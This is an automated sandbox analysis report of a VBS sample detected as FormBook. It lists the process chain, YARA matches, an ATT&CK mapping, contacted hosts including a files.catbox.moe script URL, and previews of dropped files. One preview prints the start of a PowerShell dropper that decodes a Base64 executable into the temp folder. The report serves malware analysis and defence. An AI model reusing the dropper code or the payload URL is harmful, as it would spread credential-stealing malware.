            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F67008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Exploitation for Client Execution            		221
            Scripting            		411
            Process Injection            		1
            Masquerading            		OS Credential Dumping21
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            PowerShell            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            scan file.Vbs.vbs8%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://files.catbox.moe;0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            files.catbox.moe
            		108.181.20.35
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://files.catbox.moe/qrz18p.ps1false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://files.catbox.moe;wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1547470385.000001C1E3ECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://files.catbox.moe/qrz18p.ps1#/_wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://files.catbox.moe/qrz18p.ps14wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1547470385.000001C1E3ECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://oneget.orgXpowershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://files.catbox.moe/wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore68powershell.exe, 00000003.00000002.1521457119.000001C1D3E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://files.catbox.moewscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1521457119.000001C1D3E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oneget.orgpowershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  108.181.20.35
                                                  		files.catbox.moeCanada
                                                  		852ASN852CAfalse

                                                  General Information

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1592503
                                                  Start date and time:2025-01-16 08:28:11 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 9s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:scan file.Vbs.vbs
                                                  Detection:MAL
                                                  Classification:mal100.spre.troj.expl.evad.winVBS@8/7@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 66.7%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 39
                                                  • Number of non-executed functions: 238
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs
                                                  • Stop behavior analysis, all processes terminated

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 4280 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  02:29:21API Interceptor4x Sleep call for process: powershell.exe modified
                                                  02:29:57API Interceptor3x Sleep call for process: RegAsm.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                  • files.catbox.moe/p1yr9i.pdf
                                                  SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                  • files.catbox.moe/nzct1p

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  files.catbox.moeBNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                  • 108.181.20.35
                                                  1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                  • 108.181.20.35
                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                  • 108.181.20.35
                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                  • 108.181.20.35
                                                  doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 108.181.20.35
                                                  TT copy.jsGet hashmaliciousFormBookBrowse
                                                  • 108.181.20.35
                                                  z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                  • 108.181.20.35
                                                  2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                  • 108.181.20.35
                                                  QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                  • 108.181.20.35
                                                  PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                  • 108.181.20.35

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ASN852CAQQE81XYXon.dllGet hashmaliciousWannacryBrowse
                                                  • 104.205.84.1
                                                  BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                  • 108.181.20.35
                                                  Gn8CvJE07O.dllGet hashmaliciousWannacryBrowse
                                                  • 142.52.100.1
                                                  xd.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 23.17.91.145
                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 173.180.89.149
                                                  9kNjKSEUym.dllGet hashmaliciousWannacryBrowse
                                                  • 173.181.137.1
                                                  ruXU7wj3X9.dllGet hashmaliciousWannacryBrowse
                                                  • 207.219.89.51
                                                  m9oUIFauYl.dllGet hashmaliciousWannacryBrowse
                                                  • 209.29.139.1
                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                  • 209.171.55.67
                                                  spc.elfGet hashmaliciousUnknownBrowse
                                                  • 104.205.84.120

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19file.dllGet hashmaliciousMatanbuchusBrowse
                                                  • 108.181.20.35
                                                  Purchase Order No.5817-0001142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 108.181.20.35
                                                  Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 108.181.20.35
                                                  153776434-874356550.05.exeGet hashmaliciousUnknownBrowse
                                                  • 108.181.20.35
                                                  download.bin.exeGet hashmaliciousNjrat, XRedBrowse
                                                  • 108.181.20.35
                                                  Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                  • 108.181.20.35
                                                  BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                  • 108.181.20.35
                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                  • 108.181.20.35
                                                  00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                  • 108.181.20.35

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Temp\dddddd.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):451364
                                                  Entropy (8bit):5.9839948239717575
                                                  Encrypted:false
                                                  SSDEEP:12288:8RAWU0v0bFXiRl+9ElifB8cr3XQoqDUTNm5T5h1:8hMiL+4if5r3fqDUpeh1
                                                  MD5:D5E5F019B77065E7E67B0A09F7EA59E2
                                                  SHA1:405F8732EB9F9DCCB37D2809DBF748BCD05DFF54
                                                  SHA-256:124447758D0ED2C6AC30860C237593591F3C8B53195850BB2F93E96258BD6716
                                                  SHA-512:D3420E38E2DD97C06DCA6752BDC340175F3BE7EE2B838AD362797CB0045087B25C78C7EEE0C8BFDB2384985D8FA15D4EC100DFD0BB48B619C39D3EC8C69E4707
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAGmPVp4AAAAAAAAAAOAAAgELATAAAH4AAACoBAAAAAAACmAFAADABAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgBQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANTFBABXAAAAAEAFAKYFAAAAAAAAAAAAAAAAAAAAAAAAAIAFAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAUACAAAAAAAAAAAAAAAAMAEAEgAAAAAAAAAAAAAAABTE2hTFSF9hJ8EAAAgAAAAoAQAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAABR7AAAAwAQAAHwAAACkBAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACmBQAAAEAFAAAGAAAAIAUAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAABgBQAAAgAAACYFAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAUAAAIAAAAoBQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):226
                                                  Entropy (8bit):5.360398796477698
                                                  Encrypted:false
                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                  MD5:3A8957C6382192B71471BD14359D0B12
                                                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\qrz18p[1].ps1

                                                  Download File
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):451364
                                                  Entropy (8bit):5.9839948239717575
                                                  Encrypted:false
                                                  SSDEEP:12288:8RAWU0v0bFXiRl+9ElifB8cr3XQoqDUTNm5T5h1:8hMiL+4if5r3fqDUpeh1
                                                  MD5:D5E5F019B77065E7E67B0A09F7EA59E2
                                                  SHA1:405F8732EB9F9DCCB37D2809DBF748BCD05DFF54
                                                  SHA-256:124447758D0ED2C6AC30860C237593591F3C8B53195850BB2F93E96258BD6716
                                                  SHA-512:D3420E38E2DD97C06DCA6752BDC340175F3BE7EE2B838AD362797CB0045087B25C78C7EEE0C8BFDB2384985D8FA15D4EC100DFD0BB48B619C39D3EC8C69E4707
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAGmPVp4AAAAAAAAAAOAAAgELATAAAH4AAACoBAAAAAAACmAFAADABAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgBQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANTFBABXAAAAAEAFAKYFAAAAAAAAAAAAAAAAAAAAAAAAAIAFAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAUACAAAAAAAAAAAAAAAAMAEAEgAAAAAAAAAAAAAAABTE2hTFSF9hJ8EAAAgAAAAoAQAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAABR7AAAAwAQAAHwAAACkBAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACmBQAAAEAFAAAGAAAAIAUAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAABgBQAAAgAAACYFAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAUAAAIAAAAoBQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:@...e................................................@..........

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ncv4h0d.3pf.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prnctkee.3ow.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\x.exe

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):338432
                                                  Entropy (8bit):7.913051572715407
                                                  Encrypted:false
                                                  SSDEEP:6144:gBbv9z3H32bmVxs0IwiD9rJmiQtOqjfN7r591aK+SVeiRY:gRp3H326VyV9rMltOqzz9k3SVeiRY
                                                  MD5:700263396E8D316FC5651BC5B4E456EC
                                                  SHA1:62ACBD8FAB6E13AFFFDEA76221273065DE3BEE14
                                                  SHA-256:4A93DA55912BB941C41DCC396337E145164100E0E17AD0D46707E9F3156B8B8F
                                                  SHA-512:D6C58917E7EFD3AE95EF17D9C37EC147B0142E6EBD947C0FCC98C90181FCE4F9F021B5C3503998A30C39169FDFECEBF68470A19A531B07F2D5FAFA3DC3D041F8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.V...............0..~...........`....... ....@.. ....................................`.....................................W....@...............................................................................`..................H............S.hS.!}..... ......................@....text....{.......|.................. ..`.rsrc........@....... ..............@..@.............`.......&.............. ..`.reloc...............(..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:ASCII text, with CRLF line terminators
                                                  Entropy (8bit):4.8751713206653
                                                  TrID:
                                                  • Visual Basic Script (13500/0) 100.00%
                                                  File name:scan file.Vbs.vbs
                                                  File size:3'414 bytes
                                                  MD5:05858832309fb4678a256789d4104520
                                                  SHA1:7f46ed7c8b3dc0736c9cecfb435ec73caa8faef6
